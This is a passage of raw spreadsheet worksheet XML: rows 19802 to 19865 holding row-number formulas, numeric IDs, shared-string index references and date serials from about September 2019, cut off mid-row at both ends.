        <v>25592</v>
      </c>
      <c r="F19802" t="s">
        <v>9975</v>
      </c>
      <c r="G19802" t="s">
        <v>31671</v>
      </c>
    </row>
    <row r="19803" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19803">
        <f t="shared" si="309"/>
        <v>19802</v>
      </c>
      <c r="B19803">
        <v>4802</v>
      </c>
      <c r="C19803" t="s">
        <v>25497</v>
      </c>
      <c r="D19803" s="1">
        <v>43711</v>
      </c>
      <c r="E19803" t="s">
        <v>25592</v>
      </c>
      <c r="F19803" t="s">
        <v>9975</v>
      </c>
      <c r="G19803" t="s">
        <v>31672</v>
      </c>
    </row>
    <row r="19804" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19804">
        <f t="shared" si="309"/>
        <v>19803</v>
      </c>
      <c r="B19804">
        <v>4803</v>
      </c>
      <c r="C19804" t="s">
        <v>25497</v>
      </c>
      <c r="D19804" s="1">
        <v>43728</v>
      </c>
      <c r="E19804" t="s">
        <v>19705</v>
      </c>
      <c r="F19804" t="s">
        <v>9975</v>
      </c>
      <c r="G19804" t="s">
        <v>31673</v>
      </c>
    </row>
    <row r="19805" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19805">
        <f t="shared" si="309"/>
        <v>19804</v>
      </c>
      <c r="B19805">
        <v>4804</v>
      </c>
      <c r="C19805" t="s">
        <v>25497</v>
      </c>
      <c r="D19805" s="1">
        <v>43727</v>
      </c>
      <c r="E19805" t="s">
        <v>25543</v>
      </c>
      <c r="F19805" t="s">
        <v>9975</v>
      </c>
      <c r="G19805" t="s">
        <v>31674</v>
      </c>
    </row>
    <row r="19806" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19806">
        <f t="shared" si="309"/>
        <v>19805</v>
      </c>
      <c r="B19806">
        <v>4805</v>
      </c>
      <c r="C19806" t="s">
        <v>25497</v>
      </c>
      <c r="D19806" s="1">
        <v>43725</v>
      </c>
      <c r="F19806" t="s">
        <v>9975</v>
      </c>
      <c r="G19806" t="s">
        <v>31675</v>
      </c>
    </row>
    <row r="19807" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19807">
        <f t="shared" si="309"/>
        <v>19806</v>
      </c>
      <c r="B19807">
        <v>4806</v>
      </c>
      <c r="C19807" t="s">
        <v>25497</v>
      </c>
      <c r="D19807" s="1">
        <v>43711</v>
      </c>
      <c r="E19807" t="s">
        <v>25517</v>
      </c>
      <c r="F19807" t="s">
        <v>9975</v>
      </c>
      <c r="G19807" t="s">
        <v>31676</v>
      </c>
    </row>
    <row r="19808" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19808">
        <f t="shared" si="309"/>
        <v>19807</v>
      </c>
      <c r="B19808">
        <v>4807</v>
      </c>
      <c r="C19808" t="s">
        <v>25497</v>
      </c>
      <c r="D19808" s="1">
        <v>43712</v>
      </c>
      <c r="F19808" t="s">
        <v>9975</v>
      </c>
      <c r="G19808" t="s">
        <v>31677</v>
      </c>
    </row>
    <row r="19809" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19809">
        <f t="shared" si="309"/>
        <v>19808</v>
      </c>
      <c r="B19809">
        <v>4808</v>
      </c>
      <c r="C19809" t="s">
        <v>25497</v>
      </c>
      <c r="D19809" s="1">
        <v>43726</v>
      </c>
      <c r="E19809" t="s">
        <v>31678</v>
      </c>
      <c r="F19809" t="s">
        <v>9975</v>
      </c>
      <c r="G19809" t="s">
        <v>31679</v>
      </c>
    </row>
    <row r="19810" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19810">
        <f t="shared" si="309"/>
        <v>19809</v>
      </c>
      <c r="B19810">
        <v>4809</v>
      </c>
      <c r="C19810" t="s">
        <v>25497</v>
      </c>
      <c r="D19810" s="1">
        <v>43738</v>
      </c>
      <c r="E19810" t="s">
        <v>31680</v>
      </c>
      <c r="F19810" t="s">
        <v>9978</v>
      </c>
      <c r="G19810" t="s">
        <v>31681</v>
      </c>
    </row>
    <row r="19811" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19811">
        <f t="shared" si="309"/>
        <v>19810</v>
      </c>
      <c r="B19811">
        <v>4810</v>
      </c>
      <c r="C19811" t="s">
        <v>25497</v>
      </c>
      <c r="D19811" s="1">
        <v>43731</v>
      </c>
      <c r="F19811" t="s">
        <v>9975</v>
      </c>
      <c r="G19811" t="s">
        <v>31682</v>
      </c>
    </row>
    <row r="19812" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19812">
        <f t="shared" si="309"/>
        <v>19811</v>
      </c>
      <c r="B19812">
        <v>4811</v>
      </c>
      <c r="C19812" t="s">
        <v>25497</v>
      </c>
      <c r="D19812" s="1">
        <v>43730</v>
      </c>
      <c r="E19812" t="s">
        <v>25504</v>
      </c>
      <c r="F19812" t="s">
        <v>9975</v>
      </c>
      <c r="G19812" t="s">
        <v>31683</v>
      </c>
    </row>
    <row r="19813" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19813">
        <f t="shared" si="309"/>
        <v>19812</v>
      </c>
      <c r="B19813">
        <v>4812</v>
      </c>
      <c r="C19813" t="s">
        <v>25497</v>
      </c>
      <c r="D19813" s="1">
        <v>43728</v>
      </c>
      <c r="E19813" t="s">
        <v>26940</v>
      </c>
      <c r="F19813" t="s">
        <v>9975</v>
      </c>
      <c r="G19813" t="s">
        <v>31684</v>
      </c>
    </row>
    <row r="19814" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19814">
        <f t="shared" si="309"/>
        <v>19813</v>
      </c>
      <c r="B19814">
        <v>4813</v>
      </c>
      <c r="C19814" t="s">
        <v>25497</v>
      </c>
      <c r="D19814" s="1">
        <v>43727</v>
      </c>
      <c r="E19814" t="s">
        <v>25502</v>
      </c>
      <c r="F19814" t="s">
        <v>9975</v>
      </c>
      <c r="G19814" t="s">
        <v>31685</v>
      </c>
    </row>
    <row r="19815" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19815">
        <f t="shared" si="309"/>
        <v>19814</v>
      </c>
      <c r="B19815">
        <v>4814</v>
      </c>
      <c r="C19815" t="s">
        <v>25497</v>
      </c>
      <c r="D19815" s="1">
        <v>43717</v>
      </c>
      <c r="E19815" t="s">
        <v>25517</v>
      </c>
      <c r="F19815" t="s">
        <v>9975</v>
      </c>
      <c r="G19815" t="s">
        <v>31686</v>
      </c>
    </row>
    <row r="19816" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19816">
        <f t="shared" si="309"/>
        <v>19815</v>
      </c>
      <c r="B19816">
        <v>4815</v>
      </c>
      <c r="C19816" t="s">
        <v>25497</v>
      </c>
      <c r="D19816" s="1">
        <v>43717</v>
      </c>
      <c r="E19816" t="s">
        <v>31687</v>
      </c>
      <c r="F19816" t="s">
        <v>9975</v>
      </c>
      <c r="G19816" t="s">
        <v>31688</v>
      </c>
    </row>
    <row r="19817" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19817">
        <f t="shared" si="309"/>
        <v>19816</v>
      </c>
      <c r="B19817">
        <v>4816</v>
      </c>
      <c r="C19817" t="s">
        <v>25497</v>
      </c>
      <c r="D19817" s="1">
        <v>43726</v>
      </c>
      <c r="E19817" t="s">
        <v>25517</v>
      </c>
      <c r="F19817" t="s">
        <v>9975</v>
      </c>
      <c r="G19817" t="s">
        <v>31689</v>
      </c>
    </row>
    <row r="19818" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19818">
        <f t="shared" si="309"/>
        <v>19817</v>
      </c>
      <c r="B19818">
        <v>4817</v>
      </c>
      <c r="C19818" t="s">
        <v>25497</v>
      </c>
      <c r="D19818" s="1">
        <v>43718</v>
      </c>
      <c r="E19818" t="s">
        <v>25592</v>
      </c>
      <c r="F19818" t="s">
        <v>9975</v>
      </c>
      <c r="G19818" t="s">
        <v>31690</v>
      </c>
    </row>
    <row r="19819" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19819">
        <f t="shared" si="309"/>
        <v>19818</v>
      </c>
      <c r="B19819">
        <v>4818</v>
      </c>
      <c r="C19819" t="s">
        <v>25497</v>
      </c>
      <c r="D19819" s="1">
        <v>43737</v>
      </c>
      <c r="F19819" t="s">
        <v>9975</v>
      </c>
      <c r="G19819" t="s">
        <v>31691</v>
      </c>
    </row>
    <row r="19820" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19820">
        <f t="shared" si="309"/>
        <v>19819</v>
      </c>
      <c r="B19820">
        <v>4819</v>
      </c>
      <c r="C19820" t="s">
        <v>25497</v>
      </c>
      <c r="D19820" s="1">
        <v>43724</v>
      </c>
      <c r="E19820" t="s">
        <v>25517</v>
      </c>
      <c r="F19820" t="s">
        <v>9975</v>
      </c>
      <c r="G19820" t="s">
        <v>31692</v>
      </c>
    </row>
    <row r="19821" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19821">
        <f t="shared" si="309"/>
        <v>19820</v>
      </c>
      <c r="B19821">
        <v>4820</v>
      </c>
      <c r="C19821" t="s">
        <v>25497</v>
      </c>
      <c r="D19821" s="1">
        <v>43727</v>
      </c>
      <c r="E19821" t="s">
        <v>25584</v>
      </c>
      <c r="F19821" t="s">
        <v>9975</v>
      </c>
      <c r="G19821" t="s">
        <v>31693</v>
      </c>
    </row>
    <row r="19822" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19822">
        <f t="shared" si="309"/>
        <v>19821</v>
      </c>
      <c r="B19822">
        <v>4821</v>
      </c>
      <c r="C19822" t="s">
        <v>25497</v>
      </c>
      <c r="D19822" s="1">
        <v>43717</v>
      </c>
      <c r="F19822" t="s">
        <v>9975</v>
      </c>
      <c r="G19822" t="s">
        <v>31694</v>
      </c>
    </row>
    <row r="19823" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19823">
        <f t="shared" si="309"/>
        <v>19822</v>
      </c>
      <c r="B19823">
        <v>4822</v>
      </c>
      <c r="C19823" t="s">
        <v>25497</v>
      </c>
      <c r="D19823" s="1">
        <v>43726</v>
      </c>
      <c r="E19823" t="s">
        <v>31695</v>
      </c>
      <c r="F19823" t="s">
        <v>9975</v>
      </c>
      <c r="G19823" t="s">
        <v>31696</v>
      </c>
    </row>
    <row r="19824" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19824">
        <f t="shared" si="309"/>
        <v>19823</v>
      </c>
      <c r="B19824">
        <v>4823</v>
      </c>
      <c r="C19824" t="s">
        <v>25497</v>
      </c>
      <c r="D19824" s="1">
        <v>43717</v>
      </c>
      <c r="E19824" t="s">
        <v>25512</v>
      </c>
      <c r="F19824" t="s">
        <v>9975</v>
      </c>
      <c r="G19824" t="s">
        <v>31697</v>
      </c>
    </row>
    <row r="19825" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19825">
        <f t="shared" si="309"/>
        <v>19824</v>
      </c>
      <c r="B19825">
        <v>4824</v>
      </c>
      <c r="C19825" t="s">
        <v>25497</v>
      </c>
      <c r="D19825" s="1">
        <v>43718</v>
      </c>
      <c r="E19825" t="s">
        <v>31698</v>
      </c>
      <c r="F19825" t="s">
        <v>9975</v>
      </c>
      <c r="G19825" t="s">
        <v>31699</v>
      </c>
    </row>
    <row r="19826" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19826">
        <f t="shared" si="309"/>
        <v>19825</v>
      </c>
      <c r="B19826">
        <v>4825</v>
      </c>
      <c r="C19826" t="s">
        <v>25497</v>
      </c>
      <c r="D19826" s="1">
        <v>43727</v>
      </c>
      <c r="F19826" t="s">
        <v>9975</v>
      </c>
      <c r="G19826" t="s">
        <v>31700</v>
      </c>
    </row>
    <row r="19827" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19827">
        <f t="shared" si="309"/>
        <v>19826</v>
      </c>
      <c r="B19827">
        <v>4826</v>
      </c>
      <c r="C19827" t="s">
        <v>25497</v>
      </c>
      <c r="D19827" s="1">
        <v>43725</v>
      </c>
      <c r="E19827" t="s">
        <v>31701</v>
      </c>
      <c r="F19827" t="s">
        <v>10526</v>
      </c>
      <c r="G19827" t="s">
        <v>31702</v>
      </c>
    </row>
    <row r="19828" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19828">
        <f t="shared" si="309"/>
        <v>19827</v>
      </c>
      <c r="B19828">
        <v>4827</v>
      </c>
      <c r="C19828" t="s">
        <v>25497</v>
      </c>
      <c r="D19828" s="1">
        <v>43728</v>
      </c>
      <c r="E19828" t="s">
        <v>31703</v>
      </c>
      <c r="F19828" t="s">
        <v>9975</v>
      </c>
      <c r="G19828" t="s">
        <v>31704</v>
      </c>
    </row>
    <row r="19829" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19829">
        <f t="shared" si="309"/>
        <v>19828</v>
      </c>
      <c r="B19829">
        <v>4828</v>
      </c>
      <c r="C19829" t="s">
        <v>25497</v>
      </c>
      <c r="D19829" s="1">
        <v>43725</v>
      </c>
      <c r="E19829" t="s">
        <v>25592</v>
      </c>
      <c r="F19829" t="s">
        <v>9975</v>
      </c>
      <c r="G19829" t="s">
        <v>31705</v>
      </c>
    </row>
    <row r="19830" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19830">
        <f t="shared" si="309"/>
        <v>19829</v>
      </c>
      <c r="B19830">
        <v>4829</v>
      </c>
      <c r="C19830" t="s">
        <v>25497</v>
      </c>
      <c r="D19830" s="1">
        <v>43729</v>
      </c>
      <c r="E19830" t="s">
        <v>31706</v>
      </c>
      <c r="F19830" t="s">
        <v>9978</v>
      </c>
      <c r="G19830" t="s">
        <v>31707</v>
      </c>
    </row>
    <row r="19831" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19831">
        <f t="shared" si="309"/>
        <v>19830</v>
      </c>
      <c r="B19831">
        <v>4830</v>
      </c>
      <c r="C19831" t="s">
        <v>25497</v>
      </c>
      <c r="D19831" s="1">
        <v>43726</v>
      </c>
      <c r="E19831" t="s">
        <v>25512</v>
      </c>
      <c r="F19831" t="s">
        <v>9975</v>
      </c>
      <c r="G19831" t="s">
        <v>31708</v>
      </c>
    </row>
    <row r="19832" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19832">
        <f t="shared" si="309"/>
        <v>19831</v>
      </c>
      <c r="B19832">
        <v>4831</v>
      </c>
      <c r="C19832" t="s">
        <v>25497</v>
      </c>
      <c r="D19832" s="1">
        <v>43717</v>
      </c>
      <c r="F19832" t="s">
        <v>9975</v>
      </c>
      <c r="G19832" t="s">
        <v>31709</v>
      </c>
    </row>
    <row r="19833" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19833">
        <f t="shared" si="309"/>
        <v>19832</v>
      </c>
      <c r="B19833">
        <v>4832</v>
      </c>
      <c r="C19833" t="s">
        <v>25497</v>
      </c>
      <c r="D19833" s="1">
        <v>43712</v>
      </c>
      <c r="F19833" t="s">
        <v>10526</v>
      </c>
      <c r="G19833" t="s">
        <v>31710</v>
      </c>
    </row>
    <row r="19834" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19834">
        <f t="shared" si="309"/>
        <v>19833</v>
      </c>
      <c r="B19834">
        <v>4833</v>
      </c>
      <c r="C19834" t="s">
        <v>25497</v>
      </c>
      <c r="D19834" s="1">
        <v>43738</v>
      </c>
      <c r="E19834" t="s">
        <v>29994</v>
      </c>
      <c r="F19834" t="s">
        <v>9975</v>
      </c>
      <c r="G19834" t="s">
        <v>31711</v>
      </c>
    </row>
    <row r="19835" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19835">
        <f t="shared" si="309"/>
        <v>19834</v>
      </c>
      <c r="B19835">
        <v>4834</v>
      </c>
      <c r="C19835" t="s">
        <v>25497</v>
      </c>
      <c r="D19835" s="1">
        <v>43729</v>
      </c>
      <c r="E19835" t="s">
        <v>31712</v>
      </c>
      <c r="F19835" t="s">
        <v>9975</v>
      </c>
      <c r="G19835" t="s">
        <v>31713</v>
      </c>
    </row>
    <row r="19836" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19836">
        <f t="shared" si="309"/>
        <v>19835</v>
      </c>
      <c r="B19836">
        <v>4835</v>
      </c>
      <c r="C19836" t="s">
        <v>25497</v>
      </c>
      <c r="D19836" s="1">
        <v>43727</v>
      </c>
      <c r="F19836" t="s">
        <v>9975</v>
      </c>
      <c r="G19836" t="s">
        <v>31714</v>
      </c>
    </row>
    <row r="19837" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19837">
        <f t="shared" si="309"/>
        <v>19836</v>
      </c>
      <c r="B19837">
        <v>4836</v>
      </c>
      <c r="C19837" t="s">
        <v>25497</v>
      </c>
      <c r="D19837" s="1">
        <v>43717</v>
      </c>
      <c r="E19837" t="s">
        <v>31715</v>
      </c>
      <c r="F19837" t="s">
        <v>9975</v>
      </c>
      <c r="G19837" t="s">
        <v>31716</v>
      </c>
    </row>
    <row r="19838" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19838">
        <f t="shared" si="309"/>
        <v>19837</v>
      </c>
      <c r="B19838">
        <v>4837</v>
      </c>
      <c r="C19838" t="s">
        <v>25497</v>
      </c>
      <c r="D19838" s="1">
        <v>43717</v>
      </c>
      <c r="E19838" t="s">
        <v>31717</v>
      </c>
      <c r="F19838" t="s">
        <v>9975</v>
      </c>
      <c r="G19838" t="s">
        <v>31718</v>
      </c>
    </row>
    <row r="19839" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19839">
        <f t="shared" si="309"/>
        <v>19838</v>
      </c>
      <c r="B19839">
        <v>4838</v>
      </c>
      <c r="C19839" t="s">
        <v>25497</v>
      </c>
      <c r="D19839" s="1">
        <v>43724</v>
      </c>
      <c r="E19839" t="s">
        <v>25517</v>
      </c>
      <c r="F19839" t="s">
        <v>9975</v>
      </c>
      <c r="G19839" t="s">
        <v>31719</v>
      </c>
    </row>
    <row r="19840" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19840">
        <f t="shared" si="309"/>
        <v>19839</v>
      </c>
      <c r="B19840">
        <v>4839</v>
      </c>
      <c r="C19840" t="s">
        <v>25497</v>
      </c>
      <c r="D19840" s="1">
        <v>43721</v>
      </c>
      <c r="F19840" t="s">
        <v>9975</v>
      </c>
      <c r="G19840" t="s">
        <v>31720</v>
      </c>
    </row>
    <row r="19841" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19841">
        <f t="shared" si="309"/>
        <v>19840</v>
      </c>
      <c r="B19841">
        <v>4840</v>
      </c>
      <c r="C19841" t="s">
        <v>25497</v>
      </c>
      <c r="D19841" s="1">
        <v>43718</v>
      </c>
      <c r="F19841" t="s">
        <v>9975</v>
      </c>
      <c r="G19841" t="s">
        <v>31721</v>
      </c>
    </row>
    <row r="19842" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19842">
        <f t="shared" si="309"/>
        <v>19841</v>
      </c>
      <c r="B19842">
        <v>4841</v>
      </c>
      <c r="C19842" t="s">
        <v>25497</v>
      </c>
      <c r="D19842" s="1">
        <v>43710</v>
      </c>
      <c r="E19842" t="s">
        <v>19672</v>
      </c>
      <c r="F19842" t="s">
        <v>9975</v>
      </c>
      <c r="G19842" t="s">
        <v>31722</v>
      </c>
    </row>
    <row r="19843" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19843">
        <f t="shared" ref="A19843:A19906" si="310">+ROW(A19842)</f>
        <v>19842</v>
      </c>
      <c r="B19843">
        <v>4842</v>
      </c>
      <c r="C19843" t="s">
        <v>25497</v>
      </c>
      <c r="D19843" s="1">
        <v>43709</v>
      </c>
      <c r="F19843" t="s">
        <v>9975</v>
      </c>
      <c r="G19843" t="s">
        <v>31723</v>
      </c>
    </row>
    <row r="19844" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19844">
        <f t="shared" si="310"/>
        <v>19843</v>
      </c>
      <c r="B19844">
        <v>4843</v>
      </c>
      <c r="C19844" t="s">
        <v>25497</v>
      </c>
      <c r="D19844" s="1">
        <v>43725</v>
      </c>
      <c r="E19844" t="s">
        <v>19705</v>
      </c>
      <c r="F19844" t="s">
        <v>9975</v>
      </c>
      <c r="G19844" t="s">
        <v>31724</v>
      </c>
    </row>
    <row r="19845" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19845">
        <f t="shared" si="310"/>
        <v>19844</v>
      </c>
      <c r="B19845">
        <v>4844</v>
      </c>
      <c r="C19845" t="s">
        <v>25497</v>
      </c>
      <c r="D19845" s="1">
        <v>43718</v>
      </c>
      <c r="E19845" t="s">
        <v>25509</v>
      </c>
      <c r="F19845" t="s">
        <v>10021</v>
      </c>
      <c r="G19845" t="s">
        <v>31725</v>
      </c>
    </row>
    <row r="19846" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19846">
        <f t="shared" si="310"/>
        <v>19845</v>
      </c>
      <c r="B19846">
        <v>4845</v>
      </c>
      <c r="C19846" t="s">
        <v>25497</v>
      </c>
      <c r="D19846" s="1">
        <v>43731</v>
      </c>
      <c r="E19846" t="s">
        <v>26645</v>
      </c>
      <c r="F19846" t="s">
        <v>9975</v>
      </c>
      <c r="G19846" t="s">
        <v>31726</v>
      </c>
    </row>
    <row r="19847" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19847">
        <f t="shared" si="310"/>
        <v>19846</v>
      </c>
      <c r="B19847">
        <v>4846</v>
      </c>
      <c r="C19847" t="s">
        <v>25497</v>
      </c>
      <c r="D19847" s="1">
        <v>43728</v>
      </c>
      <c r="E19847" t="s">
        <v>25592</v>
      </c>
      <c r="F19847" t="s">
        <v>9975</v>
      </c>
      <c r="G19847" t="s">
        <v>31727</v>
      </c>
    </row>
    <row r="19848" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19848">
        <f t="shared" si="310"/>
        <v>19847</v>
      </c>
      <c r="B19848">
        <v>4847</v>
      </c>
      <c r="C19848" t="s">
        <v>25497</v>
      </c>
      <c r="D19848" s="1">
        <v>43731</v>
      </c>
      <c r="E19848" t="s">
        <v>31728</v>
      </c>
      <c r="F19848" t="s">
        <v>9978</v>
      </c>
      <c r="G19848" t="s">
        <v>31729</v>
      </c>
    </row>
    <row r="19849" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19849">
        <f t="shared" si="310"/>
        <v>19848</v>
      </c>
      <c r="B19849">
        <v>4848</v>
      </c>
      <c r="C19849" t="s">
        <v>25497</v>
      </c>
      <c r="D19849" s="1">
        <v>43737</v>
      </c>
      <c r="F19849" t="s">
        <v>9978</v>
      </c>
      <c r="G19849" t="s">
        <v>31730</v>
      </c>
    </row>
    <row r="19850" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19850">
        <f t="shared" si="310"/>
        <v>19849</v>
      </c>
      <c r="B19850">
        <v>4849</v>
      </c>
      <c r="C19850" t="s">
        <v>25497</v>
      </c>
      <c r="D19850" s="1">
        <v>43724</v>
      </c>
      <c r="E19850" t="s">
        <v>25512</v>
      </c>
      <c r="F19850" t="s">
        <v>9975</v>
      </c>
      <c r="G19850" t="s">
        <v>31731</v>
      </c>
    </row>
    <row r="19851" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19851">
        <f t="shared" si="310"/>
        <v>19850</v>
      </c>
      <c r="B19851">
        <v>4850</v>
      </c>
      <c r="C19851" t="s">
        <v>25497</v>
      </c>
      <c r="D19851" s="1">
        <v>43724</v>
      </c>
      <c r="E19851" t="s">
        <v>25592</v>
      </c>
      <c r="F19851" t="s">
        <v>9975</v>
      </c>
      <c r="G19851" t="s">
        <v>31732</v>
      </c>
    </row>
    <row r="19852" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19852">
        <f t="shared" si="310"/>
        <v>19851</v>
      </c>
      <c r="B19852">
        <v>4851</v>
      </c>
      <c r="C19852" t="s">
        <v>25497</v>
      </c>
      <c r="D19852" s="1">
        <v>43724</v>
      </c>
      <c r="E19852" t="s">
        <v>31733</v>
      </c>
      <c r="F19852" t="s">
        <v>9975</v>
      </c>
      <c r="G19852" t="s">
        <v>31734</v>
      </c>
    </row>
    <row r="19853" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19853">
        <f t="shared" si="310"/>
        <v>19852</v>
      </c>
      <c r="B19853">
        <v>4852</v>
      </c>
      <c r="C19853" t="s">
        <v>25497</v>
      </c>
      <c r="D19853" s="1">
        <v>43734</v>
      </c>
      <c r="F19853" t="s">
        <v>9975</v>
      </c>
      <c r="G19853" t="s">
        <v>31735</v>
      </c>
    </row>
    <row r="19854" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19854">
        <f t="shared" si="310"/>
        <v>19853</v>
      </c>
      <c r="B19854">
        <v>4853</v>
      </c>
      <c r="C19854" t="s">
        <v>25497</v>
      </c>
      <c r="D19854" s="1">
        <v>43735</v>
      </c>
      <c r="E19854" t="s">
        <v>25509</v>
      </c>
      <c r="F19854" t="s">
        <v>10021</v>
      </c>
      <c r="G19854" t="s">
        <v>31736</v>
      </c>
    </row>
    <row r="19855" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19855">
        <f t="shared" si="310"/>
        <v>19854</v>
      </c>
      <c r="B19855">
        <v>4854</v>
      </c>
      <c r="C19855" t="s">
        <v>25497</v>
      </c>
      <c r="D19855" s="1">
        <v>43733</v>
      </c>
      <c r="E19855" t="s">
        <v>25512</v>
      </c>
      <c r="F19855" t="s">
        <v>9975</v>
      </c>
      <c r="G19855" t="s">
        <v>31737</v>
      </c>
    </row>
    <row r="19856" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19856">
        <f t="shared" si="310"/>
        <v>19855</v>
      </c>
      <c r="B19856">
        <v>4855</v>
      </c>
      <c r="C19856" t="s">
        <v>25497</v>
      </c>
      <c r="D19856" s="1">
        <v>43735</v>
      </c>
      <c r="F19856" t="s">
        <v>10021</v>
      </c>
      <c r="G19856" t="s">
        <v>31738</v>
      </c>
    </row>
    <row r="19857" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19857">
        <f t="shared" si="310"/>
        <v>19856</v>
      </c>
      <c r="B19857">
        <v>4856</v>
      </c>
      <c r="C19857" t="s">
        <v>25497</v>
      </c>
      <c r="D19857" s="1">
        <v>43738</v>
      </c>
      <c r="E19857" t="s">
        <v>31739</v>
      </c>
      <c r="F19857" t="s">
        <v>9978</v>
      </c>
      <c r="G19857" t="s">
        <v>31740</v>
      </c>
    </row>
    <row r="19858" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19858">
        <f t="shared" si="310"/>
        <v>19857</v>
      </c>
      <c r="B19858">
        <v>4857</v>
      </c>
      <c r="C19858" t="s">
        <v>25497</v>
      </c>
      <c r="D19858" s="1">
        <v>43728</v>
      </c>
      <c r="E19858" t="s">
        <v>31741</v>
      </c>
      <c r="F19858" t="s">
        <v>10021</v>
      </c>
      <c r="G19858" t="s">
        <v>31742</v>
      </c>
    </row>
    <row r="19859" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19859">
        <f t="shared" si="310"/>
        <v>19858</v>
      </c>
      <c r="B19859">
        <v>4858</v>
      </c>
      <c r="C19859" t="s">
        <v>25497</v>
      </c>
      <c r="D19859" s="1">
        <v>43733</v>
      </c>
      <c r="E19859" t="s">
        <v>25512</v>
      </c>
      <c r="F19859" t="s">
        <v>9975</v>
      </c>
      <c r="G19859" t="s">
        <v>31743</v>
      </c>
    </row>
    <row r="19860" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19860">
        <f t="shared" si="310"/>
        <v>19859</v>
      </c>
      <c r="B19860">
        <v>4859</v>
      </c>
      <c r="C19860" t="s">
        <v>25497</v>
      </c>
      <c r="D19860" s="1">
        <v>43738</v>
      </c>
      <c r="E19860" t="s">
        <v>25942</v>
      </c>
      <c r="F19860" t="s">
        <v>9975</v>
      </c>
      <c r="G19860" t="s">
        <v>31744</v>
      </c>
    </row>
    <row r="19861" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19861">
        <f t="shared" si="310"/>
        <v>19860</v>
      </c>
      <c r="B19861">
        <v>4860</v>
      </c>
      <c r="C19861" t="s">
        <v>25497</v>
      </c>
      <c r="D19861" s="1">
        <v>43737</v>
      </c>
      <c r="E19861" t="s">
        <v>31745</v>
      </c>
      <c r="F19861" t="s">
        <v>10021</v>
      </c>
      <c r="G19861" t="s">
        <v>31746</v>
      </c>
    </row>
    <row r="19862" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19862">
        <f t="shared" si="310"/>
        <v>19861</v>
      </c>
      <c r="B19862">
        <v>4861</v>
      </c>
      <c r="C19862" t="s">
        <v>25497</v>
      </c>
      <c r="D19862" s="1">
        <v>43720</v>
      </c>
      <c r="E19862" t="s">
        <v>25723</v>
      </c>
      <c r="F19862" t="s">
        <v>9975</v>
      </c>
      <c r="G19862" t="s">
        <v>31747</v>
      </c>
    </row>
    <row r="19863" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19863">
        <f t="shared" si="310"/>
        <v>19862</v>
      </c>
      <c r="B19863">
        <v>4862</v>
      </c>
      <c r="C19863" t="s">
        <v>25497</v>
      </c>
      <c r="D19863" s="1">
        <v>43729</v>
      </c>
      <c r="E19863" t="s">
        <v>31748</v>
      </c>
      <c r="F19863" t="s">
        <v>10526</v>
      </c>
      <c r="G19863" t="s">
        <v>31749</v>
      </c>
    </row>
    <row r="19864" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19864">
        <f t="shared" si="310"/>
        <v>19863</v>
      </c>
      <c r="B19864">
        <v>4863</v>
      </c>
      <c r="C19864" t="s">
        <v>25497</v>
      </c>
      <c r="D19864" s="1">
        <v>43728</v>
      </c>
      <c r="F19864" t="s">
        <v>9975</v>
      </c>
      <c r="G19864" t="s">
        <v>31750</v>
      </c>
    </row>
    <row r="19865" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19865">
        <f t="shared" si="310"/>
        <v>19864</v>
      </c>
      <c r="B19865">
        <v>4864</v>
      </c>
      <c r="C19865" t="s">
